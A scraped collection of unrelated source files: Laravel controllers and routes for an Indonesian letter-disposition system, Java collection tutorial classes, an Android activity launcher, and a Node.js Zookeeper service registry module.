* @return \Illuminate\Http\Response
*/
public function show($id)
{
//
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
//
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request, $id)
{
//
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
User::where('id',$id)->delete();
return redirect('user');
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use File;
class DisposisiController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function __construct()
{
$this->middleware('auth');
}
public function resepsionis_list()
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$notif = Disposisi::where('status',2)->get();
return view('/resepsionis/list', compact('count', 'hitung', 'disposisi', 'notif'))->with('count', $count);
}
public function ketua_tu_list()
{
$count = Disposisi::where('status',1)->count();
$disposisi = Disposisi::all();
return view('/ketua_tu/list',['disposisi' => $disposisi])->with('count', $count);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create_resepsionis(Request $request)
{
$this->validate($request,[
'surat_dari' => ['required','min:5','max:20'],
'tgl_surat' => ['required'],
'tgl_terima' => ['required'],
'no_surat' => ['required'],
'no_agenda' => ['required'],
'perihal' => ['required']
]);
Disposisi::create([
'surat_dari' => $request->surat_dari,
'tgl_surat' => $request->tgl_surat,
'tgl_terima' => $request->tgl_terima,
'no_surat' => $request->no_surat,
'no_agenda' => $request->no_agenda,
'perihal' => $request->perihal,
'status' => '1'
]);
return redirect('disposisi');
}
public function create(){
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::where('aktor','resepsionis')->get();
return view('resepsionis/create',['disposisi' => $disposisi], ['hitung'=>$hitung])->with('count', $count);
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
//
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show(Request $request, $id)
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::where('aktor','resepsionis')->get();
$show = Disposisi::where('id',$id)->get();
Disposisi::where('id',$request->id)->update([
'status' => '3'
]);
return view('/resepsionis/show', ['disposisi' => $show], ['hitung'=>$hitung])->with('count', $count);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::where('aktor','resepsionis')->get();
$edit = Disposisi::where('id',$id)->get();
return view('/resepsionis/edit', ['disposisi' => $edit], ['hitung'=>$hitung])->with('count', $count);
}
public function edit2($id)
{
$count = Disposisi::where('status',1)->count();
$disposisi = Disposisi::where('status',1)->get();
$edit = Disposisi::where('id',$id)->get();
return view('/ketua_tu/edit', ['disposisi' => $edit])->with('count', $count);
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request)
{
$this->validate($request,[
'surat_dari' => ['required','min:5','max:20'],
'tgl_surat' => ['required'],
'tgl_terima' => ['required'],
'no_surat' => ['required'],
'no_agenda' => ['required'],
'perihal' => ['required']
]);
Disposisi::where('id',$request->id)->update([
'surat_dari' => $request->surat_dari,
'tgl_surat' => $request->tgl_surat,
'tgl_terima' => $request->tgl_terima,
'no_surat' => $request->no_surat,
'no_agenda' => $request->no_agenda,
'perihal' => $request->perihal,
]);
return redirect('disposisi');
}
public function update2(Request $request)
{
$this->validate($request,[
'kepada' => ['required'],
'isi_disposisi' => ['required'],
'diteruskan_kpd' => ['required'],
]);
Disposisi::where('id',$request->id)->update([
'kepada' => $request->kepada,
'isi_disposisi' => $request->isi_disposisi,
'diteruskan_kpd' => $request->diteruskan_kpd,
'status' => '2'
]);
return redirect('disposisi2');
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep><?php
namespace App\Http\Controllers;
use Illuminate\Http\Request;
use App\Disposisi;
use App\Arsip;
use App\Surat;
use App\Auth;
use File;
class SuratController extends Controller
{
/**
* Display a listing of the resource.
*
* @return \Illuminate\Http\Response
*/
public function __construct()
{
$this->middleware('auth');
}
public function index()
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$all=Disposisi::all();
return view('/user/surat',compact('disposisi', 'all'))->with('count', $count);
}
public function masuk_resepsionis()
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$all=Disposisi::all();
return view('/resepsionis/masuk',compact('disposisi', 'all', 'hitung'))->with('count', $count);
}
public function masuk_ketua_tu()
{
$count = Disposisi::where('status',1)->count();
$disposisi = Disposisi::where('status',1)->get();
$all=Disposisi::all();
return view('/ketua_tu/masuk',compact('disposisi', 'all'))->with('count', $count);
}
/**
* Show the form for creating a new resource.
*
* @return \Illuminate\Http\Response
*/
public function create(Request $request, $id)
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::where('status',2)->orWhere('status',3)->get();
$show = Disposisi::where('id',$id)->get();
return view('/user/baca', ['disposisi' => $show])->with('count', $count);
}
public function create_keluar(Request $request){
$nomer=Surat::count();
$this->validate($request,[
'no_surat' => ['required'],
'kepada' => ['required'],
'perihal' => ['required'],
'isi_surat' => ['required']
]);
Surat::create([
'no_surat' => $request->no_surat,
'kepada' => $request->kepada,
'perihal' => $request->perihal,
'isi_surat' => $request->isi_surat,
'dari' => $request->dari
]);
return redirect('/surat_keluar')->with('nomer', $nomer);
}
/**
* Store a newly created resource in storage.
*
* @param \Illuminate\Http\Request $request
* @return \Illuminate\Http\Response
*/
public function store(Request $request)
{
Arsip::create([
'surat_dari' => $request->surat_dari,
'tgl_surat' => $request->tgl_surat,
'tgl_terima' => $request->tgl_terima,
'no_surat' => $request->no_surat,
'no_agenda' => $request->no_agenda,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_disposisi' => $request->isi_disposisi,
'diteruskan_kepada' => $request->diteruskan_kpd,
'jenis_surat' => 'surat masuk',
'milik' => $request->milik
]);
Disposisi::where('id',$request->id)->update([
'status' => '4'
]);
return redirect('/surat_masuk');
}
public function arsipkan(Request $request){
Surat::where('id',$request->id)->update([
'status' => '2'
]);
Arsip::create([
'no_surat' => $request->no_surat,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_surat' => $request->isi_surat,
'jenis_surat' => 'surat keluar',
'surat_dari' => $request->surat_dari,
'milik' => $request->milik
]);
return redirect('/surat_keluar');
}
public function tombol(Request $request){
Surat::where('id',$request->id)->update([
'status' => '2'
]);
Arsip::create([
'no_surat' => $request->no_surat,
'perihal' => $request->perihal,
'kepada' => $request->kepada,
'isi_surat' => $request->isi_surat,
'jenis_surat' => 'surat keluar',
'surat_dari' => $request->surat_dari
]);
return redirect('/surat_keluar');
}
public function tombol2(Request $request){
Surat::where('id',$request->id)->update([
'status' => '0'
]);
return redirect('/surat_keluar');
}
public function cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->Where('milik', auth()->user()->role->role)->get();
return view('user.arsip', compact('arsip', 'disposisi'))->with('count', $count);
}
public function resepsionis_cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->get();
return view('resepsionis.arsip', compact('arsip', 'disposisi', 'hitung'))->with('count', $count);
}
public function ketua_tu_cari(Request $request){
$dari = $request->dari;
$sampai = $request->sampai;
$jenis = $request->jenis;
$count = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::whereBetween('updated_at', [$dari, $sampai])->Where('jenis_surat', $jenis)->get();
return view('ketua_tu.arsip', compact('arsip', 'disposisi'))->with('count', $count);
}
public function lihat(Request $request, $id){
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$show = Surat::where('id',$id)->get();
return view('/user/show', ['show' => $show], ['disposisi' => $disposisi])->with('count', $count);
}
/**
* Display the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function show(Request $request)
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::all();
return view('user.arsip', compact('arsip', 'disposisi', 'outs'))->with('count', $count);
}
public function resepsionis_show(Request $request)
{
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::where('milik', auth()->user()->role->role);
return view('resepsionis.arsip', compact('arsip', 'disposisi', 'outs', 'hitung'))->with('count', $count);
}
public function ketua_tu_show(Request $request)
{
$count = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$outs = Surat::where('status',2)->get();
$arsip = Arsip::all();
return view('ketua_tu.arsip', compact('arsip', 'disposisi', 'outs'))->with('count', $count);
}
public function create_form(Request $request)
{
$nomer=Surat::count();
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$arsip = Arsip::all();
return view('/user/create',['arsip' => $arsip], ['disposisi' => $disposisi])->with('count', $count)->with('nomer', $nomer);
}
public function keluar(Request $request){
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$keluar = Surat::all();
return view('/user/keluar',['keluar' => $keluar], ['disposisi' => $disposisi])->with('count', $count);
}
public function resepsionis_keluar(Request $request){
$count = Disposisi::where('status',2)->count();
$hitung = Disposisi::where('status',2)->count();
$disposisi = Disposisi::all();
$keluar = Surat::all();
return view('/resepsionis/keluar',compact('disposisi', 'keluar', 'hitung'))->with('count', $count);
}
/**
* Show the form for editing the specified resource.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function edit($id)
{
$count = Disposisi::where('status',2)->orWhere('status',3)->count();
$disposisi = Disposisi::all();
$keluar = Surat::all();
$edit = Surat::where('id',$id)->get();
return view('/user/edit',['keluar' => $edit], ['disposisi' => $disposisi])->with('count', $count);
}
/**
* Update the specified resource in storage.
*
* @param \Illuminate\Http\Request $request
* @param int $id
* @return \Illuminate\Http\Response
*/
public function update(Request $request)
{
$this->validate($request,[
'no_surat' => ['required'],
'kepada' => ['required'],
'perihal' => ['required'],
'isi_surat' => ['required']
]);
Surat::where('id',$request->id)->update([
'no_surat' => $request->no_surat,
'kepada' => $request->kepada,
'perihal' => $request->perihal,
'isi_surat' => $request->isi_surat
]);
return redirect('surat_keluar');
}
/**
* Remove the specified resource from storage.
*
* @param int $id
* @return \Illuminate\Http\Response
*/
public function destroy($id)
{
//
}
}
<file_sep><?php
/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/
use Illuminate\Support\Facades\Auth;
use Illuminate\Support\Facades\Route;
Route::get('/', function () {
return view('auth/login');
});
Route::get('/profile', function () {
return view('profile');
});
Route::group(['middleware' => ['web', 'auth', 'roles']],function(){
Route::group(['roles'=>'Resepsionis'],function(){
Route::get('/disposisi', 'DisposisiController@resepsionis_list');
Route::get('/disposisi/edit/{id}','DisposisiController@edit');
Route::get('/disposisi/show/{id}','DisposisiController@show');
Route::post('/disposisi/update','DisposisiController@update');
Route::get('/create', 'DisposisiController@create');
Route::get('/resepsionis/surat_masuk', 'SuratController@masuk_resepsionis');
Route::get('/resepsionis/surat_keluar', 'SuratController@resepsionis_keluar');
Route::get('/resepsionis/arsip', 'SuratController@resepsionis_show');
Route::get('/resepsionis/arsip/cari', 'SuratController@resepsionis_cari');
Route::post('/disposisi/proses', 'DisposisiController@create_resepsionis');
});
Route::group(['roles'=>'Sub. Bag. TU'],function(){
Route::get('/home', 'HomeController@index')->name('home');
Route::get('/user', 'UserController@index');
Route::get('/user/delete/{id}', 'UserController@destroy');
Route::get('/user/tambah', 'UserController@tambah');
Route::post('/user/tambah/create', 'UserController@create');
Route::get('/disposisi2', 'DisposisiController@ketua_tu_list');
Route::get('/disposisi2/edit2/{id}','DisposisiController@edit2');
Route::get('/ketua_tu/surat_masuk', 'SuratController@masuk_ketua_tu');
Route::get('/ketua_tu/arsip', 'SuratController@ketua_tu_show');
Route::get('/ketua_tu/arsip/cari', 'SuratController@ketua_tu_cari');
Route::post('/disposisi2/update2','DisposisiController@update2');
});
Route::get('/home_user', 'BrandaController@index');
Route::get('/surat_masuk/list', 'SuratController@show');
Route::get('/surat_masuk/cari', 'SuratController@cari');
Route::get('/surat_masuk', 'SuratController@index');
Route::get('/surat_keluar', 'SuratController@keluar');
Route::get('/surat_keluar/create', 'SuratController@create_form');
Route::get('/surat_keluar/edit/{id}', 'SuratController@edit');
Route::get('/surat_keluar/show/{id}', 'SuratController@lihat');
Route::post('/surat_keluar/update', 'SuratController@update');
Route::get('/surat_masuk/baca/{id}', 'SuratController@create');
Route::post('/surat_masuk/arsip', 'SuratController@store');
Route::post('/surat_keluar/arsip', 'SuratController@arsipkan');
Route::get('/surat_keluar/arsip/{id}', 'SuratController@tombol');
Route::get('/surat_keluar/arsip2/{id}', 'SuratController@tombol2');
Route::post('/surat_keluar/proses', 'SuratController@create_keluar');
});
Auth::routes();
Route::get('/home', 'HomeController@index')->name('home');
<file_sep><?php
use Illuminate\Support\Facades\Schema;
use Illuminate\Database\Schema\Blueprint;
use Illuminate\Database\Migrations\Migration;
class Arsip extends Migration
{
/**
* Run the migrations.
*
* @return void
*/
public function up()
{
Schema::create('arsip', function (Blueprint $table) {
$table->bigIncrements('id');
$table->enum('jenis_surat',['Surat Masuk','Surat Keluar']);
$table->string('surat_dari');
$table->date('tgl_surat');
$table->date('tgl_terima');
$table->string('no_surat');
$table->unsignedBigInteger('no_agenda');
$table->string('perihal');
$table->string('aktor');
$table->string('kepada');
$table->string('isi_disposisi');
$table->text('isi_surat');
$table->string('diteruskan_kepada');
$table->timestamps();
});
}
/**
* Reverse the migrations.
*
* @return void
*/
public function down()
{
//
}
}
| 54dd2a2adc385315a52bfaa5615d96f92e7d8a91 | [
"PHP"
] | 9 | PHP | budi01010/SISMAK-Sistem-Informasi-Surat-Masuk-dan-Keluar- | e0a7f9f73de04770255bb374ced3934a1b3a7a90 | b976a23e6f3abf0f86469b5dc1ec763ff1b8918a |
refs/heads/master | <repo_name>muhtamim/PocketLibraryAdmin<file_sep>/app/src/main/java/leadinguniversity/pocketlibraryadmin/Util/ActivityLancher.java
package leadinguniversity.pocketlibraryadmin.Util;
import android.content.Context;
import android.content.Intent;
import leadinguniversity.pocketlibraryadmin.Ui.AddBookActivity;
import leadinguniversity.pocketlibraryadmin.Ui.BooksActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditBookActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditProfileActivity;
import leadinguniversity.pocketlibraryadmin.Ui.EditPublisherActivity;
import leadinguniversity.pocketlibraryadmin.Ui.LoginActivity;
import leadinguniversity.pocketlibraryadmin.Ui.PDFViewerActivity;
import leadinguniversity.pocketlibraryadmin.Ui.RegisterActivity;
import leadinguniversity.pocketlibraryadmin.data.Book;
import leadinguniversity.pocketlibraryadmin.data.Publisher;
public final class ActivityLancher {
public static final String BOOK_KEY = "book";
public static final String publisher_KEY = "publisher";
public static void openLoginActivity(Context context) {
context.startActivity(new Intent(context, LoginActivity.class));
}
public static void openBooksActivity(Context context) {
context.startActivity(new Intent(context, BooksActivity.class));
}
public static void openRegisterActivity(Context context) {
context.startActivity(new Intent(context, RegisterActivity.class));
}
public static void openAddBookActivity(Context context){
Intent i = new Intent(context, AddBookActivity.class);
context.startActivity(i);
}
public static void openEditBookActivity(Context context, Book book){
Intent i = new Intent(context, EditBookActivity.class);
i.putExtra(BOOK_KEY, book);
context.startActivity(i);
}
public static void openEditpublisherFragment(Context context, Publisher publisher){
Intent i = new Intent(context, EditPublisherActivity.class);
i.putExtra("publisher_KEY", publisher);
context.startActivity(i);
}
public static void openEditPublisherActivity(Context context, Publisher publisher){
Intent i = new Intent(context, EditProfileActivity.class);
i.putExtra("publisher_KEY", publisher);
context.startActivity(i);
}
public static void openPDFViewerActivity(Context context, Book book){
Intent i = new Intent(context, PDFViewerActivity.class);
i.putExtra(BOOK_KEY, book);
context.startActivity(i);
}
}
| 14ccab4379110a37b54190fee8aeb4b55dc4c165 | [
"Java"
] | 1 | Java | muhtamim/PocketLibraryAdmin | b53026ab9514f2c317301ce5ac0e7a3fbbca235f | fb5ec7844015120f9e4c5216991fe402e79dddd9 |
refs/heads/master | <repo_name>NivethaRS16/JavaBasics<file_sep>/VectorClass.java
package com.java.Test;
import java.util.Vector;
public class VectorClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
Vector vec = new Vector(7);
// use add() method to add elements in the vector
vec.add(1);
vec.add(2);
vec.add(3);
vec.add(4);
vec.add(5);
vec.add(6);
vec.add(7);
vec.add(8);
// checking capacity
System.out.println("Size of vector: " + vec.size());
System.out.println("Capacity of vector: " + vec.capacity());
}
}
<file_sep>/SynchronizedCollection.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Collections;
import java.util.List;
import java.util.concurrent.CopyOnWriteArrayList;
public class SynchronizedCollection {
public static void main(String[] args) {
// TODO Auto-generated method stub
//Method 1
List<Integer> list = Collections.synchronizedList(new ArrayList<Integer>());
list.add(1);
list.add(2);
list.add(3);
synchronized(list)
{
list.forEach(x -> System.out.println("List val is "+x));
}
//Method 2
CopyOnWriteArrayList<String> a = new CopyOnWriteArrayList<String>();
a.add("A");
a.add("B");
a.add("C");
for(String str:a)
{
System.out.println("List is = "+str);
}
}
}<file_sep>/ImmutableListClass.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Arrays;
import java.util.Collection;
import java.util.Collections;
import java.util.List;
import com.google.common.collect.ImmutableList;
public class ImmutableListClass {
static <T> void createList(List<T> list)
{
ImmutableList<T> l = ImmutableList.copyOf(list);
System.out.println(l);
}
public static void main(String[] args) {
// TODO Auto-generated method stub
//Create immutable list - Method1
ImmutableList<String> list = ImmutableList.of("Geeks", "For", "Geeks");
//System.out.println(list);
//list.add("Add");
System.out.println(list);
//Create immutable list - Method 2
List<String> l1 = new ArrayList<String>(Arrays.asList("Geeks", "For", "Geeks"));
createList(l1);
List<Integer> l11 = new ArrayList<Integer>(Arrays.asList(1,2,3));
createList(l11);
//Create immutable list - Method 3
List<String> a = List.of();
//a.add(0, "Test");
System.out.println(a);
//Create immutable list - Method 4
ImmutableList<String> list1 = ImmutableList.<String>builder().add("Immutable").build();
//list1.add("test");
System.out.println(list1);
//Create immutable list - Method 5
List<String> l2 = List.of("Test","immutable");
ImmutableList<String> list2 = ImmutableList.<String>builder().addAll(l2).add("list").build();
//list2.add("test");
System.out.println(list2);
//Create list add to immutable list created by unmodifiableList then add elements to list - possible
List<Integer> l12 = new ArrayList<Integer>(Arrays.asList(1,2,3));
List<Integer> list11 = Collections.unmodifiableList(l12);
l12.add(10);
System.out.println(list11);
//Create list add to immutable list then add elements to list - not possible - error
List<String> l22 = List.of("Test","immutable");
ImmutableList<String> list12 = ImmutableList.copyOf(l22);
l22.add("test");
System.out.println(l2);
}
}
<file_sep>/EnumInterface.java
package com.java.Test;
public enum EnumInterface implements MyInterface {
SUM {
@Override
public String asLowercase() {
return SUM.toString().toLowerCase();
}
},
SUBTRACT {
@Override
public String asLowercase() {
return SUBTRACT.toString().toLowerCase();
}
};
}<file_sep>/Reverse.java
package com.java.Test;
public class Reverse {
static int reverse(int a)
{
int rev = 0;
//System.out.println(a);
while(a !=0)
{
rev = rev * 10;
rev = rev + a % 10;
a = a/10;
}
return rev;
}
public static void main(String[] args) {
//Reverse r = new Reverse();
System.out.println("Reverse is "+reverse(1234));
}
}
<file_sep>/MyInterface.java
package com.java.Test;
public interface MyInterface {
String asLowercase();
}
<file_sep>/LinkedListClass.java
package com.java.Test;
import java.util.ArrayList;
import java.util.Collections;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.LinkedList;
import java.util.ListIterator;
public class LinkedListClass {
public static void main(String[] args) {
// TODO Auto-generated method stub
//Create a linked list
LinkedList<String> l1 = new LinkedList<String>();
l1.add("Vijaya");
l1.add("Nivi");
l1.add("Harshi");
l1.addFirst("Senthil");
l1.addLast("Vignesh");
//iterate through using ListIterator both forward and backward
ListIterator it = l1.listIterator();
while(it.hasNext())
{
System.out.println("Linked list "+it.next());
}
/*
while(it.hasPrevious())
{
System.out.println("Reverse order "+it.previous());
}
//Sorted
Collections.sort(l1);
System.out.println("Sorted "+l1);
//Reverse Sort - Method 1
Collections.sort(l1,Collections.reverseOrder());
System.out.println("Reverse Sorted "+l1);
//Reverse Sort - Method 2
Iterator t1 = l1.descendingIterator();
while(t1.hasNext())
{
System.out.println("Reverse sorted list "+t1.next());
}
//LinkedList to Array
String[] array = l1.toArray(new String[l1.size()]);
for (int i = 0; i < array.length; i++)
{
System.out.println(array[i]);
}
//LinkedList to ArrayList
ArrayList<String> a1 = new ArrayList<String>(l1);
for(String str: l1)
{
System.out.println(str);
}
*/
l1.push("Pushing new");
System.out.println("After push "+l1);
l1.pop();
System.out.println("After pop "+l1);
System.out.println("After push "+l1);
Object o = l1.peek();
System.out.println(" peep value "+o);
System.out.println("After push "+l1);
Object o1 = l1.peekLast();
System.out.println(" peep last value "+o1);
System.out.println("After push "+l1);
Object o2 = l1.poll();
System.out.println(" poll value "+o2);
System.out.println("After push "+l1);
Object o3 = l1.pollLast();
System.out.println(" poll value "+o3);
System.out.println("After push "+l1);
Enumeration e1 = Collections.enumeration(l1);
while(e1.hasMoreElements())
{
System.out.println("List "+e1.nextElement());
}
}
}
<file_sep>/Factorial.java
package com.java.Test;
public class Factorial {
static int fact(int num)
{
int output;
if ( num == 1 )
return 1;
else
output = num * fact(num - 1);
return output;
}
public static void main(String[] args) {
System.out.println("factorial is "+fact(15));
}
}
<file_sep>/HashMapClass.java
package com.java.Test;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Map.Entry;
import java.util.Set;
import java.util.TreeMap;
public class HashMapClass {
public static <E> void main(String[] args) {
// TODO Auto-generated method stub
HashMap<Integer,String> hmap = new HashMap<Integer,String>();
hmap.put(1, "A");
hmap.put(5, "B");
hmap.put(16, "C");
hmap.put(2, "D");
hmap.put(11, "E");
System.out.println(hmap);
//Iterate HashMap
Set s1 = hmap.entrySet();
Iterator i1 = s1.iterator();
while(i1.hasNext())
{
Map.Entry m1 = (Map.Entry) i1.next();
System.out.print("Key is: "+m1.getKey() + " & Value is: "+m1.getValue()+"\n");
}
Map<Integer,String> hmap1 = new TreeMap<Integer,String>(hmap);
Set s2 = hmap1.entrySet();
Iterator i2 = s2.iterator();
while(i2.hasNext())
{
Map.Entry m2 = (Map.Entry) i2.next();
System.out.print("Key is: "+m2.getKey() + " & Value is: "+m2.getValue()+"\n");
}
//Empty hashmap
hmap.clear();
System.out.println(hmap);
//FInd if empty or not
boolean b = hmap.isEmpty();
System.out.println("Empty val "+b);
//Sort hashMap
}
}
<file_sep>/SerializeClass.java
package com.java.Test;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Map;
import java.util.Set;
public class SerializeClass {
static void InputSerialise(HashMap<Integer,String> hmap)
{
try {
FileOutputStream fos = new FileOutputStream("out.ser");
ObjectOutputStream oos = new ObjectOutputStream(fos);
oos.writeObject(hmap);
oos.close();
fos.close();
System.out.println("serialised data stored");
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
}
static void OuputSerialse(String s1)
{
HashMap<Integer, String> map = null;
FileInputStream fis;
try {
fis = new FileInputStream("out.ser");
ObjectInputStream ois = new ObjectInputStream(fis);
map = (HashMap<Integer, String>) ois.readObject();
ois.close();
fis.close();
} catch (FileNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (IOException e) {
// TODO Auto-generated catch block
e.printStackTrace();
} catch (ClassNotFoundException e) {
// TODO Auto-generated catch block
e.printStackTrace();
}
Set set = map.entrySet();
Iterator iterator = set.iterator();
while(iterator.hasNext())
{
Map.Entry mentry = (Map.Entry)iterator.next();
System.out.print("key: "+ mentry.getKey() + " & Value: ");
System.out.println(mentry.getValue());
}
}
public static void main(String[] args) {
// TODO Auto-generated method stub
HashMap<Integer,String> hmap = new HashMap<Integer,String>();
hmap.put(1, "A");
hmap.put(5, "B");
hmap.put(16, "C");
hmap.put(2, "D");
hmap.put(11, "E");
System.out.println(hmap);
InputSerialise(hmap);
OuputSerialse("out.ser");
}
}
| c2d78d3e7a1d6fca543a78eac4f0327bf0415ccd | [
"Java"
] | 10 | Java | NivethaRS16/JavaBasics | f3e8b15036dda6bb23147c373e159ff651f92723 | 85f596e5de73e8b64c7cdfd2f2be16a7aec898a6 |
refs/heads/master | <file_sep>'use strict';
require('rootpath');
/*
*
* Constants.
*
*/
var SERIALIZE_ID = 7
, URL_FIELD = 'url'
, RESULT_FIELD = 'response'
;
function serialize(body) {
return body;
}
function deserialize(body) {
return body;
}
module.exports = {
SERIALIZE_ID: SERIALIZE_ID,
URL_FIELD : URL_FIELD,
RESULT_FIELD: RESULT_FIELD,
serialize : serialize,
deserialize : deserialize
};
<file_sep>'use strict';
/**
* Registry.
* This module is designed to subscribe Pigeon servers and server weights from
* the registry for remote service call.
*
* Module dependencies:
* Index ---> Registry
* Registry ---> Registry
*/
require('rootpath')();
var _ = require('underscore')
, async = require('async')
, zookeeper = require('node-zookeeper-client')
, Error = require('lib/error')
, logger = require('lib/logger')('registry')
, tcpRegistry = require('lib/registry/tcp')
, httpRegistry = require('lib/registry/http')
;
/*
*
* Constants.
*
*/
var SESSION_TIMEOUT = 30 * 1000
, SPIN_DELAY = 1000
, RETRIES = 1000
, CONNECT_TIMEOUT = 5 * 1000
;
var PLACEHOLDER = '^'
, PATH_SEPARATOR = '/'
, SERVER_PATH = '/DP/SERVER'
, WEIGHT_PATH = '/DP/WEIGHT'
;
/*
*
* Globals.
*
*/
var g_zk = {}
, g_init = false
;
function Registry(service) {
this.service = service;
this.registry = whichRegistry(this.service.configs);
}
Registry.prototype.startup = function startup(done) {
g_zk = zookeeper.createClient(this.service.configs.get('zkserver'), {
sessionTimeout: SESSION_TIMEOUT,
spinDelay: SPIN_DELAY,
retries: RETRIES
});
var that = this;
g_zk.on('connected', function() {
logger.info('Zookeeper connection: state(connected).');
g_init = true;
done && done();
});
g_zk.on('expired', function() {
logger.warn('Zookeeper connection: state(expired).');
g_zk.close();
that.startup();
});
[
'connectedReadOnly',
'disconnected',
'authenticationFailed'
].forEach(function(state) {
g_zk.on(state, function() {
logger.warn('Zookeeper connection: state(%s).', state);
});
});
logger.info('Zookeeper connection: connecting...');
g_zk.connect();
setTimeout(function() {
if (!g_init) {
var err = new Error('zookeeper',
'Zookeeper connection: error(%s)', 'connection timeout');
done(err);
g_zk.close();
}
}, CONNECT_TIMEOUT);
};
Registry.prototype.subscribe = function subscribe(done) {
logger.info('Zookeeper subscription: start subscripton, service(%s).',
this.service.url);
servers(this, done);
};
function servers(context, done) {
logger.info('Zookeeper server subscription: start server subscription, ' +
'service(%s).', context.service.url);
var path = serverPath(context, context.service.url);
logger.debug('Zookeeper server subscription: node(%s), service(%s).',
path, context.service.url);
g_zk.exists(
path,
function(event) {
logger.debug('Zookeeper server subscription(*): event(%s), node(%s), service(%s)',
event.getName(), path, context.service.url);
},
function(err, stat) {
if (err) {
return done(new Error('zookeeper', 'Zookeeper server subscription: ' +
'error(%s), node(%s), service(%s).', err, path, context.service.url));
}
if (!stat) {
return done(new Error('zookeeper', 'Zookeeper server subscritpion: ' +
'error(%s), node(%s), service(%s).', 'node not found', path, context.service.url));
}
g_zk.getData(
path,
function(event) {
var name = event.getName();
switch(name) {
case 'NODE_DELETED':
logger.info('Zookeeper server subscription: event(%s), ' +
'node(%s), service(%s).', name, path, context.service.url);
context.service.router.status = {};
break;
case 'NODE_DATA_CHANGED':
logger.info('Zookeeper server subscription: event(%s), ' +
'node(%s), service(%s).', name, path, context.service.url);
servers(context, function(err) {
if (err) {
logger.error(err);
}
});
break;
default:
logger.debug('Zookeeper server subscription(*): event(%s), node(%s), ' +
'service(%s).', name, path, context.service.url);
}
},
function(err, data, stat) {
if (err) {
return done(new Error('zookeeper', 'Zookeeper server subscription: error(%s): ' +
'node(%s), service(%s).', err, path, context.service.url));
}
if (!stat) {
return done(new Error('zookeeper', 'Zookeeper error(%s): ' +
'node(%s), service(%s).', 'node not found', path, context.service.url));
}
var ips = (data && data.toString()) ? data.toString().split(',') : [];
logger.info('Zookeeper server subscription: data(%j), node(%s).', ips, path);
weights(context, ips, done);
}
)
}
);
}
